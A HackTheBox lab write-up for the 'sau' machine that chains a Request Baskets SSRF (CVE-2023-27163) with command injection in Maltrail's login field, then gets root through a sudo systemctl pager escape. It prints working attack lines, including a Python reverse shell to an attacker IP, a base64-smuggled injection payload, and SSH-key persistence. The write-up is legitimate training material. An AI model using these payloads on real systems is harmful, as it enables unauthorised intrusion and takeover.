HTB: sau Writeup

Machine Information

Summary

sau is an Easy-difficulty Linux machine that demonstrates SSRF vulnerabilities and command injection exploitation. The attack chain involves:

1. Discovering Request Baskets v1.2.1 running on port 55555
2. Exploiting CVE-2023-27163 SSRF vulnerability to access internal Maltrail service
3. Chaining with OS command injection in Maltrail’s login parameter
4. Gaining shell access as the puma user
5. Privilege escalation via GTFOBins systemctl bypass

TL;DR: SSRF → Command Injection → RCE → PrivEsc via systemctl → Root

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.147.151

Results:

PORT      STATE      SERVICE      VERSION
22/tcp    open       ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
80/tcp    filtered   http         Maltrail v0.53
8338/tcp  filtered   unknown      Maltrail v0.53
55555/tcp open       unknown      request-baskets version 1.2.1

Key Findings:

• SSH (port 22) is available
• Ports 80 and 8338 are filtered, running Maltrail v0.53
• Port 55555 is open, running request-baskets v1.2.1 (vulnerable to SSRF)

Initial Foothold

Step 1: SSRF via Request Baskets (CVE-2023-27163)

Request Baskets v1.2.1 contains a Server-Side Request Forgery (SSRF) vulnerability. We can create a basket that forwards requests to internal services.

Create a malicious basket:

curl -X POST http://10.129.147.151:55555/api/baskets/pwned \
  -H "Content-Type: application/json" \
  -d '{
    "forward_url": "http://127.0.0.1:8338/",
    "proxy_response": true,
    "insecure_tls": true,
    "expand_path": true,
    "capacity": 250
  }'

Verify access to internal Maltrail:

curl http://10.129.147.151:55555/pwned/login

This now allows us to interact with the internal Maltrail service on port 8338 through the basket proxy.

Step 2: OS Command Injection in Maltrail v0.53

Maltrail v0.53 is vulnerable to OS command injection via the login username parameter. We can exploit this by crafting a malicious payload.

Create reverse shell payload:

Generate a Python reverse shell and base64 encode it:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.X",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.Popen(["/bin/sh","-i"]);p.wait();'

Base64 encode the payload:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.X",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.Popen(["/bin/sh","-i"]);p.wait();' | base64

Set up listener:

nc -lvnp 4444

Send exploit:

curl 'http://10.129.147.151:55555/pwned/login' \
  --data 'username=;`echo BASE64_PAYLOAD|base64 -d|python3`'

Replace BASE64_PAYLOAD with your encoded payload and the attacker IP address with your actual machine IP.

Step 3: Shell Access as puma

Upon successful execution, we receive a reverse shell as the puma user.

whoami
# puma
id
# uid=1001(puma) gid=1001(puma) groups=1001(puma)

Step 4: Shell Upgrade via SSH

For more stable access, add SSH public key to authorized_keys:

mkdir -p ~/.ssh
echo "YOUR_PUBLIC_KEY" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

Now SSH in as the puma user:

ssh puma@10.129.147.151

User Flag

cat /home/puma/user.txt

Privilege Escalation

Enumeration

Check sudo privileges:

sudo -l
# (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

The puma user can run systemctl status for the trail.service without a password. This is exploitable via GTFOBins.

Exploitation via GTFOBins

The systemctl status command uses a pager (typically less) to display output. We can escape the pager to gain a shell.

sudo /usr/bin/systemctl status trail.service

While in the pager, type:

!sh

This breaks out of the pager and spawns a root shell.

whoami
# root

Root Flag

cat /root/root.txt

Attack Chain

graph TD
    A["🔍 Recon: nmap<br/>Port 22/SSH, 55555 open<br/>Port 80/8338 filtered Maltrail"] --> B["🎯 Request Baskets v1.2.1<br/>Port 55555"]
    B --> C["💥 CVE-2023-27163: SSRF<br/>Create basket forwarding to<br/>http://127.0.0.1:8338/"]
    C --> D["💉 Maltrail v0.53<br/>OS Command Injection<br/>via login username parameter"]
    D --> E["🐚 Reverse Shell<br/>Python3 reverse shell<br/>User: puma"]
    E --> F["🔐 Shell Upgrade<br/>Add SSH public key<br/>SSH access as puma"]
    F --> G["📋 Enumeration<br/>sudo -l reveals<br/>systemctl NOPASSWD"]
    G --> H["⚡ GTFOBins Exploit<br/>systemctl status<br/>!sh in pager"]
    H --> I["👑 Root Shell<br/>Complete system compromise"]

Tools Used

Key Learnings

1. SSRF as Entry Point: Server-Side Request Forgery vulnerabilities can bypass network restrictions and access internal services that appear filtered.

2. Chaining Vulnerabilities: Combining SSRF with command injection creates a powerful exploitation path (SSRF → RCE).

3. Encoding Payloads: Base64 encoding payloads helps bypass filtering and allows safe transmission through HTTP parameters.

4. Pager Escape: System utilities like systemctl status that use pagers can be exploited to break out and execute arbitrary commands (GTFOBins).

5. NOPASSWD Sudo: Even restricted sudo commands without password protection can lead to privilege escalation if they have known bypasses.

Lessons from Engagement

• Initial shell attempts required careful payload encoding and delivery method
• Base64 encoding with Python3 execution proved more reliable than raw command execution
• The GTFOBins systemctl technique is a reliable privilege escalation path when sudo access is granted

References

• CVE-2023-27163: Request Baskets SSRF vulnerability
• GTFOBins: systemctl privilege escalation technique
• Maltrail v0.53: OS Command Injection in login parameter

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Engagement Date: July 8, 2023 Last Updated: March 8, 2026 Tags: #HackTheBox #Linux #Easy #SSRF #CommandInjection #CVE-2023-27163